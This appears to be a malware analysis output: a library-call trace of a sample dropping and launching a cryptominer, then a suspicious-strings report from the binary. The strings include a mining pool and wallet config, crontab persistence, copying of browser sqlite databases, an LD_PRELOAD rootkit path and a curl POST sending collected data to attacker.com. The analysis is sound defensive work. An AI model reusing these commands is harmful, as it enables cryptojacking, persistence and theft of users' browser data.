27 22:53:24.627826 strchr("/bin", ':') = nil <0.000336>
27 22:53:24.628306 __ctype_b_loc() = 0x7d31077f36e0 <0.000306>
27 22:53:24.628757 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.629220 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.629669 __ctype_b_loc() = 0x7d31077f36e0 <0.000317>
27 22:53:24.630139 __ctype_b_loc() = 0x7d31077f36e0 <0.000281>
27 22:53:24.630581 __ctype_b_loc() = 0x7d31077f36e0 <0.000306>
27 22:53:24.631041 __ctype_b_loc() = 0x7d31077f36e0 <0.000336>
27 22:53:24.631546 __ctype_b_loc() = 0x7d31077f36e0 <0.000310>
27 22:53:24.632027 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.632473 __ctype_b_loc() = 0x7d31077f36e0 <0.000280>
27 22:53:24.632932 __ctype_b_loc() = 0x7d31077f36e0 <0.000282>
27 22:53:24.633354 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.633829 __ctype_b_loc() = 0x7d31077f36e0 <0.000278>
27 22:53:24.634260 __ctype_b_loc() = 0x7d31077f36e0 <0.000297>
27 22:53:24.634699 __ctype_b_loc() = 0x7d31077f36e0 <0.000310>
27 22:53:24.635163 malloc(32) = 0x5b4e140a93c0 <0.000276>
27 22:53:24.635594 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.636054 malloc(32) = 0x5b4e140a93f0 <0.000279>
27 22:53:24.636497 strchrnul(0x5b4e124a8020, 61, 7, 61) = 0x5b4e124a8026 <0.000329>
27 22:53:24.636992 __errno_location() = 0x7d31077f36c8 <0.000281>
27 22:53:24.637416 __isoc23_strtoimax(0x5b4e124a8027, 0x7ffc2f6b25c0, 10, 61) = 1 <0.000335>
27 22:53:24.637934 __ctype_b_loc() = 0x7d31077f36e0 <0.000283>
27 22:53:24.638359 getppid() = 24 <0.000357>
27 22:53:24.638886 __vsnprintf_chk(0x5b4e124a8205, 27, 2, -1) = 2 <0.000411>
27 22:53:24.639494 malloc(32) = 0x5b4e140a9420 <0.000376>
27 22:53:24.640061 strchrnul(0x7ffc2f6b3827, 61, 4, 0) = 0x7ffc2f6b382a <0.000310>
27 22:53:24.640539 stat64(0x7ffc2f6b382b, 0x7ffc2f6b26f0, 4, 0) = 0 <0.000426>
27 22:53:24.641118 stat64(0x5b4e124a124f, 0x7ffc2f6b2660, 0x7ffc2f6b26f0, 0x7d310790d3ee) = 0 <0.000416>
27 22:53:24.641694 strdup("/home/app") = 0x5b4e140a9450 <0.000418>
27 22:53:24.642257 __ctype_b_loc() = 0x7d31077f36e0 <0.000300>
27 22:53:24.642698 __ctype_b_loc() = 0x7d31077f36e0 <0.000311>
27 22:53:24.643161 __ctype_b_loc() = 0x7d31077f36e0 <0.000302>
27 22:53:24.643609 strchrnul(0x5b4e124a1194, 61, 0x7d31079a88c0, 0x70612f656d6f682f) = 0x5b4e124a1194 <0.000341>
27 22:53:24.644106 strlen("/home/app") = 9 <0.000404>
27 22:53:24.644641 malloc(14) = 0x5b4e140a9470 <0.000309>
27 22:53:24.645095 __mempcpy_chk(0x5b4e140a9470, 0x5b4e124a1191, 3, 14) = 0x5b4e140a9473 <0.000297>
27 22:53:24.645557 mempcpy(0x5b4e140a9474, 0x5b4e140a9450, 9, 80) = 0x5b4e140a947d <0.000361>
27 22:53:24.646088 geteuid() = 0 <0.000346>
27 22:53:24.646584 getegid() = 0 <0.000360>
27 22:53:24.647086 sigaction(SIGINT, nil, { 0, <>, 0xe, 0x12f6b382b }) = 0 <0.000380>
27 22:53:24.647658 sigfillset(~<31-32>) = 0 <0.000314>
27 22:53:24.648133 sigaction(SIGINT, { 0x5b4e1249bcd0, ~<31-32>, 0xe, 0x12f6b382b }, nil) = 0 <0.000424>
27 22:53:24.648704 sigaction(SIGQUIT, nil, { 0, <>, 0xe, 0x12f6b382b }) = 0 <0.000385>
27 22:53:24.649282 sigfillset(~<31-32>) = 0 <0.000302>
27 22:53:24.649735 sigaction(SIGQUIT, { 0, ~<31-32>, 0xe, 0x12f6b382b }, nil) = 0 <0.000427>
27 22:53:24.650317 sigaction(SIGTERM, nil, { 0, <>, 0xe, 0x12f6b382b }) = 0 <0.000383>
27 22:53:24.650948 sigfillset(~<31-32>) = 0 <0.000286>
27 22:53:24.651385 sigaction(SIGTERM, { 0, ~<31-32>, 0xe, 0x12f6b382b }, nil) = 0 <0.000452>
27 22:53:24.652009 strlen("mkdir -p /opt/.xmr 2>/dev/null") = 30 <0.000740>
27 22:53:24.652928 memcpy(0x5b4e124a84a8, "mkdir -p /opt/.xmr 2>/dev/null\0", 31) = 0x5b4e124a84a8 <0.000482>
27 22:53:24.653585 malloc(136) = 0x5b4e140a9490 <0.000329>
27 22:53:24.654057 strlen("mkdir -p /opt/.xmr 2>/dev/null") = 30 <0.000626>
27 22:53:24.654906 strcmp("mkdir", "for") = 7 <0.000400>
27 22:53:24.655542 strcmp("mkdir", "until") = -8 <0.000470>
27 22:53:24.656162 strcmp("mkdir", "in") = 4 <0.000395>
27 22:53:24.656689 strcmp("mkdir", "then") = -7 <0.000426>
27 22:53:24.657261 __ctype_b_loc() = 0x7d31077f36e0 <0.000298>
27 22:53:24.657706 __ctype_b_loc() = 0x7d31077f36e0 <0.000315>
27 22:53:24.658174 __ctype_b_loc() = 0x7d31077f36e0 <0.000298>
27 22:53:24.658618 __ctype_b_loc() = 0x7d31077f36e0 <0.000307>
27 22:53:24.659077 __ctype_b_loc() = 0x7d31077f36e0 <0.000278>
27 22:53:24.659540 strcspn("mkdir", "\210\203\201\202\204\206\207") = 5 <0.000460>
27 22:53:24.660144 mempcpy(0x5b4e124a85c0, 0x5b4e124a84c8, 6, 6) = 0x5b4e124a85c6 <0.000315>
27 22:53:24.660620 strpbrk(0x5b4e124a85c0, 0x5b4e124a2f7c, 0x5b4e124a83d0, 0x5b4e124a83d0) = 0 <0.000344>
27 22:53:24.661129 strpbrk(0x5b4e124a85c0, 0x5b4e124a28e2, 1, 16) = 0 <0.000303>
27 22:53:24.661605 strchr("mkdir", '/') = nil <0.000384>
27 22:53:24.662135 strcmp("mkdir", "jobs") = 3 <0.000408>
27 22:53:24.662679 strcmp("mkdir", "test") = -7 <0.000424>
27 22:53:24.663247 strcmp("mkdir", "read") = -5 <0.000415>
27 22:53:24.663822 strcmp("mkdir", "printf") = -3 <0.000412>
27 22:53:24.664376 strcmp("mkdir", "local") = 1 <0.000451>
27 22:53:24.664973 strcspn("-p", "\210\203\201\202\204\206\207") = 2 <0.000390>
27 22:53:24.665519 mempcpy(0x5b4e124a85d8, 0x5b4e124a84f0, 3, 3) = 0x5b4e124a85db <0.000331>
27 22:53:24.666007 strpbrk(0x5b4e124a85d8, 0x5b4e124a2f7c, 0x5b4e124a83d0, 0x5b4e124a83d0) = 0 <0.000298>
27 22:53:24.666472 strpbrk(0x5b4e124a85d8, 0x5b4e124a28e2, 8, 2) = 0 <0.000323>
27 22:53:24.666952 strcspn("/opt/.xmr", "\210\203\201\202\204\206\207") = 9 <0.000465>
27 22:53:24.667570 mempcpy(0x5b4e124a85f0, 0x5b4e124a8518, 10, 10) = 0x5b4e124a85fa <0.000319>
27 22:53:24.668038 strpbrk(0x5b4e124a85f0, 0x5b4e124a2f7c, 0x5b4e124a83d0, 0x5b4e124a83d0) = 0 <0.000299>
27 22:53:24.668503 strpbrk(0x5b4e124a85f0, 0x5b4e124a28e2, 1, 16) = 0 <0.000359>
27 22:53:24.669234 malloc(16) = 0x5b4e140a9520 <0.000308>
27 22:53:24.669682 strcspn("/dev/null", "\210\203\201\202\204\206\207") = 9 <0.000494>
27 22:53:24.670320 mempcpy(0x5b4e124a8638, 0x5b4e124a8570, 10, 10) = 0x5b4e124a8642 <0.000416>
27 22:53:24.670928 malloc(48) = 0x5b4e140a9540 <0.000447>
27 22:53:24.671568 _setjmp(0x7ffc2f6b24e0, 3, 0xfffffffefffffffe, 0x5b4e140a9570) = 0 <0.000341>
27 22:53:24.672080 open64("/dev/null", 577, 0666) = 3 <0.005286>
27 22:53:24.677589 fcntl(2, 0, 10, 2) = 10 <0.000454>
27 22:53:24.678193 close(2) = 0 <0.000370>
27 22:53:24.678694 fcntl(10, 2, 1, 0x7d310790c724) = 0 <0.000400>
27 22:53:24.679250 dup2(3, 2) = 2 <0.000395>
27 22:53:24.679801 close(3) = 0 <0.000345>
27 22:53:24.680289 strchr("mkdir", '/') = nil <0.000371>
27 22:53:24.680824 strcmp("mkdir", "jobs") = 3 <0.000395>
27 22:53:24.681362 strcmp("mkdir", "test") = -7 <0.000445>
27 22:53:24.681955 strcmp("mkdir", "read") = -5 <0.000390>
27 22:53:24.682503 strcmp("mkdir", "printf") = -3 <0.000445>
27 22:53:24.683092 strcmp("mkdir", "local") = 1 <0.000426>
27 22:53:24.683653 strcspn("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 15 <0.000997>
27 22:53:24.684815 strlen("mkdir") = 5 <0.000347>
27 22:53:24.685305 mempcpy(0x5b4e124a8658, 0x7ffc2f6b3f82, 15, 1472) = 0x5b4e124a8667 <0.000326>
27 22:53:24.685805 strcpy(0x5b4e124a8668, "mkdir") = 0x5b4e124a8668 <0.000503>
27 22:53:24.686577 stat64(0x5b4e124a8658, 0x7ffc2f6b24f0, 0x5b4e124a866d, 0) = 0xffffffff <0.000508>
27 22:53:24.687243 strcspn("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 14 <0.000838>
27 22:53:24.688228 strlen("mkdir") = 5 <0.000631>
27 22:53:24.689014 mempcpy(0x5b4e124a8658, 0x7ffc2f6b3f92, 14, 1472) = 0x5b4e124a8666 <0.000307>
27 22:53:24.689489 strcpy(0x5b4e124a8667, "mkdir") = 0x5b4e124a8667 <0.000382>
27 22:53:24.690016 stat64(0x5b4e124a8658, 0x7ffc2f6b24f0, 0x5b4e124a866c, 0) = 0xffffffff <0.000382>
27 22:53:24.690563 strcspn("/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 9 <0.000656>
27 22:53:24.691364 strlen("mkdir") = 5 <0.000358>
27 22:53:24.691884 mempcpy(0x5b4e124a8658, 0x7ffc2f6b3fa1, 9, 1472) = 0x5b4e124a8661 <0.000301>
27 22:53:24.692335 strcpy(0x5b4e124a8662, "mkdir") = 0x5b4e124a8662 <0.000374>
27 22:53:24.692874 stat64(0x5b4e124a8658, 0x7ffc2f6b24f0, 0x5b4e124a8667, 0) = 0xffffffff <0.000374>
27 22:53:24.693402 strcspn("/usr/bin:/sbin:/bin", "%:") = 8 <0.000572>
27 22:53:24.694116 strlen("mkdir") = 5 <0.000357>
27 22:53:24.694607 mempcpy(0x5b4e124a8658, 0x7ffc2f6b3fab, 8, 1472) = 0x5b4e124a8660 <0.000323>
27 22:53:24.695085 strcpy(0x5b4e124a8661, "mkdir") = 0x5b4e124a8661 <0.000345>
27 22:53:24.695588 stat64(0x5b4e124a8658, 0x7ffc2f6b24f0, 0x5b4e124a8666, 0) = 0 <0.000405>
27 22:53:24.696145 strlen("mkdir") = 5 <0.000363>
27 22:53:24.696644 malloc(29) = 0x5b4e140a9580 <0.000305>
27 22:53:24.697094 __strcpy_chk(0x5b4e140a9593, 0x5b4e124a85c0, 10, 0x5b4e140a95a0) = 0x5b4e140a9593 <0.000298>
27 22:53:24.697556 realloc(0, 160) = 0x5b4e140a95b0 <0.000312>
27 22:53:24.698015 sigfillset(~<31-32>) = 0 <0.000276>
27 22:53:24.698464 sigprocmask(SIG_UNBLOCK, ~<31-32>, nil) = 0 <0.000414>
27 22:53:24.699035 vfork(2, 0x7ffc2f6b2520, 0, 0x7d3107899f48
28 22:53:24.700145 <... vfork resumed> ) = 0 <0.001030>
28 22:53:24.700383 sigsetmask(0, 0, 0, 0x7d310790674c) = 0x7ffbfeef <0.000804>
28 22:53:24.701544 malloc(512) = 0x5b4e140a9660 <0.000663>
28 22:53:24.702488 memcpy(0x5b4e140a9668, "u?k/\374\177\0\0F8k/\374\177\0\058k/\374\177\0\0\336?k/\374\177\0\0j?k/\374\177\0\0}?k/\374\177\0\0Q8k/\374\177\0\0\277?k/\374\177\0\0p\224\n\024N[\0\0", 72) = 0x5b4e140a9668 <0.000977>
28 22:53:24.703756 strchr("mkdir", '/') = nil <0.000609>
28 22:53:24.704640 strcspn("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 15 <0.001300>
28 22:53:24.706232 strlen("mkdir") = 5 <0.000642>
28 22:53:24.707177 mempcpy(0x5b4e140a96b8, 0x7ffc2f6b3f82, 15, 1472) = 0x5b4e140a96c7 <0.000697>
28 22:53:24.708178 strcpy(0x5b4e140a96c8, "mkdir") = 0x5b4e140a96c8 <0.000751>
28 22:53:24.709191 strcspn("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 14 <0.001102>
28 22:53:24.710582 strlen("mkdir") = 5 <0.000619>
28 22:53:24.711479 mempcpy(0x5b4e140a96b8, 0x7ffc2f6b3f92, 14, 1472) = 0x5b4e140a96c6 <0.000506>
28 22:53:24.712338 strcpy(0x5b4e140a96c7, "mkdir") = 0x5b4e140a96c7 <0.000610>
28 22:53:24.713196 strcspn("/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 9 <0.000923>
28 22:53:24.714373 strlen("mkdir") = 5 <0.000607>
28 22:53:24.715226 mempcpy(0x5b4e140a96b8, 0x7ffc2f6b3fa1, 9, 1472) = 0x5b4e140a96c1 <0.000529>
28 22:53:24.716035 strcpy(0x5b4e140a96c2, "mkdir") = 0x5b4e140a96c2 <0.000585>
28 22:53:24.716878 strcspn("/usr/bin:/sbin:/bin", "%:") = 8 <0.000793>
28 22:53:24.717938 strlen("mkdir") = 5 <0.000585>
28 22:53:24.718822 mempcpy(0x5b4e140a96b8, 0x7ffc2f6b3fab, 8, 1472) = 0x5b4e140a96c0 <0.000493>
28 22:53:24.719606 strcpy(0x5b4e140a96c1, "mkdir") = 0x5b4e140a96c1 <0.000581>
28 22:53:24.720431 execve(0x5b4e140a96b8, 0x5b4e124a8618, 0x5b4e140a9668, 0
28 22:53:24.721867 --- Called exec() ---
27 22:53:24.723824 <... vfork resumed> ) = 28 <0.024727>
27 22:53:24.724030 sigsetmask(0, 0, 0, 0x7d310790674c) = 0x7ffbfeef <0.000534>
27 22:53:24.724804 wait3(0x7ffc2f6b244c, 0, 0, 0
28 22:53:24.758679 strrchr("mkdir", '/') = nil <0.000522>
28 22:53:24.759305 setlocale(LC_ALL, "") = "C" <0.000395>
28 22:53:24.759906 bindtextdomain("coreutils", "/usr/share/locale") = "/usr/share/locale" <0.000610>
28 22:53:24.760871 textdomain("coreutils") = "coreutils" <0.000391>
28 22:53:24.761541 __cxa_atexit(0x5c1daf7b9550, 0, 0x5c1daf7be008, 0) = 0 <0.000362>
28 22:53:24.762060 getopt_long(3, 0x7ffd3602aeb8, "pm:vZ", 0x5c1daf7bd9a0, nil) = 112 <0.000407>
28 22:53:24.762615 getopt_long(3, 0x7ffd3602aeb8, "pm:vZ", 0x5c1daf7bd9a0, nil) = -1 <0.000403>
28 22:53:24.763172 umask(00) = 022 <0.000369>
28 22:53:24.763675 umask(022) = 00 <0.000373>
28 22:53:24.764234 mkdir("/opt", 0777) = -1 <0.000474>
28 22:53:24.764869 __errno_location() = 0x7eca828226a0 <0.000281>
28 22:53:24.765317 chdir("/opt") = 0 <0.000432>
28 22:53:24.765934 mkdir(".xmr", 0777) = 0 <0.000920>
28 22:53:24.767060 __fpending(0x7eca82ac35c0, 0, 1, 1) = 0 <0.000320>
28 22:53:24.767548 fileno(0x7eca82ac35c0) = 1 <0.000324>
28 22:53:24.768018 __freading(0x7eca82ac35c0, 0, 1, 1) = 0 <0.000330>
28 22:53:24.768598 __freading(0x7eca82ac35c0, 0, 0, 1) = 0 <0.000541>
28 22:53:24.769303 fflush(0x7eca82ac35c0) = 0 <0.000455>
28 22:53:24.769954 fclose(0x7eca82ac35c0) = 0 <0.000362>
28 22:53:24.770478 __fpending(0x7eca82ac34e0, 0, 0x7eca82ac0e00, 0) = 0 <0.000345>
28 22:53:24.770980 fileno(0x7eca82ac34e0) = 2 <0.000286>
28 22:53:24.771403 __freading(0x7eca82ac34e0, 0, 0x7eca82ac0e00, 0) = 0 <0.000323>
28 22:53:24.771912 __freading(0x7eca82ac34e0, 0, 0, 0) = 0 <0.000297>
28 22:53:24.772352 fflush(0x7eca82ac34e0) = 0 <0.000302>
28 22:53:24.772818 fclose(0x7eca82ac34e0) = 0 <0.000356>
28 22:53:24.773713 +++ exited (status 0) +++
27 22:53:24.773966 --- SIGCHLD (Child exited) ---
27 22:53:24.774162 <... wait3 resumed> ) = 28 <0.049336>
27 22:53:24.774315 wait3(0x7ffc2f6b244c, 1, 0, 0) = 0xffffffff <0.000418>
27 22:53:24.774927 dup2(10, 2) = 2 <0.000416>
27 22:53:24.775494 close(10) = 0 <0.000378>
27 22:53:24.776015 free(0x5b4e140a9540) = <0.000279>
27 22:53:24.776431 free(0x5b4e140a9520) = <0.000299>
27 22:53:24.776892 free(0x5b4e140a9660) = <0.000276>
27 22:53:24.777316 free(0x5b4e140a9490) = <0.000303>
27 22:53:24.777754 _setjmp(0x7ffc2f6b26d0, 0x5b4e140a9480, 0x5b4e140a9, 0x5b4e124a84a8) = 0 <0.000351>
27 22:53:24.778260 _setjmp(0x7ffc2f6b26d0, 0, 0x2f200241a395ba91, 0x5b4e124a84a8) = 0 <0.000317>
27 22:53:24.778728 _exit(0
27 22:53:24.779399 +++ exited (status 0) +++
24 22:53:24.779737 --- SIGCHLD (Child exited) ---
24 22:53:24.779931 <... system resumed> ) = 0 <0.208156>
24 22:53:24.780105 malloc(863496) = 0x7b61b3f0d010 <0.000419>
24 22:53:24.784552 fopen("/tmp/.xmrig/miner", "wb") = 0x599c52d956b0 <0.000838>
24 22:53:24.785558 fwrite("\177ELF\002\001\001\003", 1, 863496, 0x599c52d956b0) = 863496 <0.002186>
24 22:53:24.787924 fclose(0x599c52d956b0) = 0 <0.000676>
24 22:53:24.788896 free(0x7b61b3f0d010) = <0.000580>
24 22:53:24.789627 chmod("/tmp/.xmrig/miner", 0755) = 0 <0.000674>
24 22:53:24.790434 fork() = 29 <0.000941>
24 22:53:24.791584 waitpid(29, 0x7ffcf4dc5a7c, 0
29 22:53:24.792043 <... fork resumed> ) = 0 <0.001559>
29 22:53:24.792261 execl(0x7ffcf4dc5aa0, 0x599c52ba5044, 0x599c52ba5041, 0
29 22:53:24.793410 --- Called exec() ---
|
==================================================================================================== MALWARE BEHAVIOR ANALYSIS REPORT Generated: 2025-11-17 22:53:26 ==================================================================================================== |
MD5: SHA1: Sha256: SSDeep:File Entopy: 6.2642 Sections: 31
Next I analyized the String ouput and the following strings came back as suspicious:
This analysis shows strings matching suspicious patterns. Active patterns (11 loaded from interesting_patterns.json): - URLs - Executables - Registry Keys - Registry Paths - Network Paths - IP Addresses - Email Addresses - Linux Paths - Sensitive Keywords - SQL Commands - Shell Commands[+] 7-bit ASCII (s) - Found 15 interesting strings:
- /tmp/.xmATUSH
- /.bash_h
- #!/bin/b
- n/bash
- _ZZZ\ZZX\ZZ^\ZZ\ZZR\ZZP\ZZV\ZZT\ZZJ\ZZH\ZZN\ZZL\ZZB\ZZ@\ZZF\ZZD\ZZz\ZZx\ZZ~\ZZ|\ZZr\ZZp\ZZv\ZZt\ZZj\ZZh\ZZn\ZZl\ZZb\ZZ`\ZZf\ZZd\ZZ
- ~WZZZZZq[ZZZZZZZZZZZZZZ[ZZZZZZZZZZZZZZZZZZZZZZZ/tmp/.xmrig/mine/tmp/.xmrig/conf{"pool":"pool.minexmr.com:4444","wallet":"attackacker_wallet"}
- (crontab -l 2>/dev/null; echo "@reboot /tmp/.xmrig/miner") | cro/tmp/.collected
- /tmp/.collected/lected/history_
- /.mozilla/firefo -name "*.sqlite" -exec cp {} /tmp/.collected/browsers/ ; 2>/de/.config/google-/tmp/.rootkit_maLD_PRELOAD rootkit would be installed at /lib/.libprocesshider.sConfiguration: /etc/ld.so.preloa/tmp/.callback.s# Network callbacurl -X POST -d @/tmp/.collected http://attacker.com:8080/exfil il 2>/dev/null
- chmod +x /tmp/.cmp/.callback.sh
- ev/null; echo "0 * * * * /tmp/.callback.sh") | ch") | crontab -
- .shstrtab
- .rela.plt
- .plt.got
- .got.plt
[+] 8-bit ASCII (S) - Found 15 interesting strings:
- H�/tmp/.xmATUSH���
- H�/.bash_h�/
- H�#!/bin/b�#
- H�n/bash
- _ZZ:_ZZ8_ZZ>_ZZ<_ZZ2_ZZ0_ZZ6_ZZ4_ZZ*_ZZ(_ZZ._ZZ,_ZZ"_ZZ _ZZ&_ZZ$_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZZ\ZZX\ZZ^\ZZ\ZZR\ZZP\ZZV\ZZT\ZZJ\ZZH\ZZN\ZZL\ZZB\ZZ@\ZZF\ZZD\ZZz\ZZx\ZZ~\ZZ|\ZZr\ZZp\ZZv\ZZt\ZZj\ZZh\ZZn\ZZl\ZZb\ZZ`\ZZf\ZZd\ZZ 6.ZZZZZ�
WZZZZZjZZZZZZZZZZZZZZZRZZZZZZZZZZZZZZZx[ZZ[ZZZjZZZZZZZZZZZZZZZ�WZZZZZ}ZZZZZZZZZZZZZZZ[ZZZZZZZ[ZZZZZZZ[ZZZYZZZZZZZZZZZZZZZZZZZ�~WZZZZZq[ZZZZZZZZZZZZZZ[ZZZZZZZZZZZZZZZZZZZZZZZ/tmp/.xmrig/mine/tmp/.xmrig/conf{"pool":"pool.minexmr.com:4444","wallet":"attackacker_wallet"}- (crontab -l 2>/dev/null; echo "@reboot /tmp/.xmrig/miner") | cro/tmp/.collected
- /tmp/.collected/lected/history_
- /.mozilla/firefo -name "*.sqlite" -exec cp {} /tmp/.collected/browsers/ ; 2>/de/.config/google-/tmp/.rootkit_maLD_PRELOAD rootkit would be installed at /lib/.libprocesshider.sConfiguration: /etc/ld.so.preloa/tmp/.callback.s# Network callbacurl -X POST -d @/tmp/.collected http://attacker.com:8080/exfil il 2>/dev/null
- chmod +x /tmp/.cmp/.callback.sh
- ev/null; echo "0 * * * * /tmp/.callback.sh") | ch") | crontab -
- .shstrtab
- .rela.plt
- .plt.got
- .got.plt
[+] Total interesting strings found: 30